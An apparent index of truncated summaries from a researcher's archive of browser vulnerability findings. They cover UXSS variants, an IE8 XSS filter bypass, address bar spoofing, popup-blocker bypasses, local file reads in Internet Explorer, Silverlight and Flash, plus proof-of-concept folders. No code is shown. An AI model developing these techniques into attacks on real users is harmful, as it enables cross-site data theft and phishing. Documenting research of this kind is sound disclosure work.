A straightforward crash: if any JavaScript prototype was modified — even just adding an arbitrary property like HTMLDivElement.prototype.ANYTHING = 777 — and then the browser's Properties dialog was...

IE8 introduced a "Compatibility View" button in the address bar. I found that when this button was clicked on a page that then performed a redirect to a page without a Content-Type header or DOCTYPE,...

IE8 introduced a built-in XSS filter that was supposed to detect reflected XSS attempts and neutralize them. After playing around for a while, I found a bypass: if the XSS payload was delivered not...

After the url:file:/// trick was patched in an earlier fix, I tried some simple variations to see whether the fix was complete. It turned out that inserting any extra characters between url and the...

This folder contains research materials from a Silverlight 2 Beta security review, including a detailed penetration testing document (Silverlight PenTest.docx) and four proof-of-concept archives...

This was a variation of the resident script technique adapted for IE8, where the previous iframe-based approaches had been patched. After playing around for a while, I found that you could cache the...

The 6on6 folder was a small personal tool — an HTML page backed by an #default#homePage behavior and userData persistence — that I used to track and quickly test browser security issues. The...

This folder contains a research document (postMessage penTest.docx) covering security considerations around the window.postMessage API, which was relatively new at the time. The notes explored...

Three separate XHR oddities I found while exploring how Internet Explorer's Microsoft.XMLHTTP ActiveX object handled unusual situations. None of them alone was a dramatic vulnerability, but together...

This folder contains a proof-of-concept for a cross-site scripting vulnerability found in a banking application. The details are archived in XSS_BOA.zip. The finding was part of broader research into...

This was a combination of two separate issues working together. First: IE accepted url:file:// as a valid iframe source, which loaded local files into an iframe from an internet-zone page. Second: a...

After the IE resident script work, I was curious whether the same class of issues appeared in Safari. It turned out that Safari had its own onunload quirk: during the unload event, you could call...

These are the proof-of-concept files I prepared for a BlueHat presentation. They cover four related techniques built around the idea of a "resident script" — JavaScript that survives a full page...

This folder contains evidence of a resident script technique discovered independently around the same time, using XML as the persistence vector rather than the HTML/iframe approach explored in other...

The Windows Media Player ActiveX control exposed a launchURL method that could open a new browser window without triggering the pop-up blocker. The method was intended to let the media player open...

A very clean residency technique: creating an OBJECT TYPE="text/html" element via document.createElement and storing it in window.opener keeps the referenced document alive and running after the page...

Another brief one from the same Silverlight testing session. Passing the userControl object from the onLoad event into IE's Enumerator constructor would crash the browser immediately. The crash was...

This one surprised me. IE's popup blocker is supposed to block window.open() calls that don't originate from a direct user gesture. The expectation is that a setTimeout delay breaks that link. What I...

A short one. If you repeatedly overwrite the innerHTML of the <div> that contains a Silverlight control, IE would crash. The Silverlight object didn't even need to have a source — an empty control...

I was lucky to find this one while testing Silverlight 2.0 Beta. The normal way to access a Silverlight control's XAML DOM from JavaScript is through...

After playing around for a while with Flash's allowScriptAccess and allowFullScreen parameters, I came across a way to have a Flash object load and interact with a remote SWF file on a different...

I was lucky to find this one. While poking at IE's ExecWB method, I discovered that when you call it with the IDM_PRINTPREVIEW command on an iframe, the third parameter — normally a printer name — is...

After playing around for a while with XAML's <Frame> element and some earlier PDF work, I noticed that loading an HTML page inside a XAML Frame seemed to inherit a surprisingly elevated security...

I was looking at how Adobe Acrobat Reader handled links embedded in PDF files when the PDF was loaded inside an IE iframe. I found that a PDF crafted with an internal link pointing to a file:/// URL...

Earlier UXSS variants using cached iframe documents required reloading the main page and using window.opener as the storage mechanism. I was looking for a simpler version and found one: by caching...

This one surprised me. By combining two techniques — loading HTML inside a XAML <Frame> element, and then using the ExecWB IDM_PRINTPREVIEW trick to open a privileged modal — it became possible to...

I was applying the cached-Document technique to IE's internal res:// protocol URLs — specifically res://ieframe.dll/dnserror.htm, the DNS error page. After caching the Document of an SWF-loaded...

On the same day as the res:// crash, I was experimenting with what happened when you appended a # fragment to the same res://ieframe.dll/dnserror.htm URL in the cached-document navigation. Instead of...

Continuing the investigation of what XAML Frame pages could access that standard Internet Zone pages could not, I found that <img> tags with file:/// URLs loaded successfully inside a XAML Frame. A...

I was looking at what local file access XAML Frame pages had compared to standard Internet Zone HTML pages. I found that inside a XAML Frame, you could set the src of a <script> element to a local...

IE7 introduced a security enhancement that blocked window.prompt in the Internet Zone and replaced it with the gold Information Bar, specifically to prevent phishing sites from mimicking login...

I was exploring a subtle difference between location.href = "about:blank" and document.URL = "about:blank" when called from inside an iframe. They behave differently in terms of which security domain...

While exploring the document.URL = "about:..." quirk from the IE 5.5 research, I found that XAML <Frame> elements in IE behaved differently from ordinary HTML iframes. Inside a XAML Frame, the about:...

While working on MSRC case 7571 — which involved using a vulnerable launchurl method to run local executables — I found a variation that went further: it was possible to use the same technique to...

I was exploring unusual combinations of IE-specific APIs and found that creating a createPopup() from inside another createPopup()'s parentWindow, and then setting the inner popup's innerHTML to...

I had previously reported a UXSS using Flash's getURL with the POST method. When Flash 9 shipped, I checked whether the GET method variant — which had been fixed in Flash 6 through 8 — was still...

This one surprised me. I noticed that Flash's getURL() function, when called with the "POST" method and a javascript: URL as the target, could execute script inside an IFRAME on a different domain....

After finding the Office XP ActiveX file-existence check, I wondered whether the Flash plugin had a similar observable side channel. It did. By setting the Movie property of a Flash <object> element...

I was looking at ActiveX controls that were marked safe for scripting but had interesting side channels. The MSDDSC.DDSC Dashboard Components control (installed with Office XP) exposed an Export...

The XP-only URL spoof using onbeforeunload and history.go(0) stopped working on Windows Vista. After some digging, I found a small adjustment that restored the behavior on Vista: instead of calling...

I was looking at address bar spoofing scenarios and found that combining window.onbeforeunload with history.go(0) produced a clean URL spoof on Windows XP. When a user typed a new URL and pressed...

I was curious whether caching execScript — the IE-specific method for running code in a window's context — from an iframe would survive a page reload in the same way that window.open had. It did. By...

The day after finding the resident cached window.open technique, I started thinking about combining it with a setCapture trick from an earlier UXSS case. The result was something a bit more...

I was looking at what happened when you cached method references from iframe contexts rather than document objects. It turned out that grabbing the window.open method from an iframe and stashing it...

This doesn't crash IE — it freezes it completely. The browser stops responding to input, can't be minimized, maximized, or closed, and disappears from the Alt+Tab list. It's alive but halted,...

The day after finding the UXSS variant using a cached iframe Document, I was curious what would happen if you navigated the same stale reference a second time in quick succession. It turned out that...

I was playing around with how IE handled the Document object of iframes loaded with non-HTML content — things like SWF, MHT, or XAML files. After some persistence, I found that caching that Document...

Passing the Application property of an IFRAME to the Enumerator constructor closes the entire browser — all tabs, no prompts — on IE7. The Application object is the top-level IWebBrowser2 interface,...

Another entry in the frameElement UXSS collection, but this one uses pure HTML — no Flash, XAML, or XML. The trick is to cache an IFRAME's contentWindow, then destroy the IFRAME with outerHTML, and...

Another variation of the setCapture() UXSS (originally case #6445). The original used setCapture() on the top window; the first variation used it inside a same-domain IFRAME. This one moves the...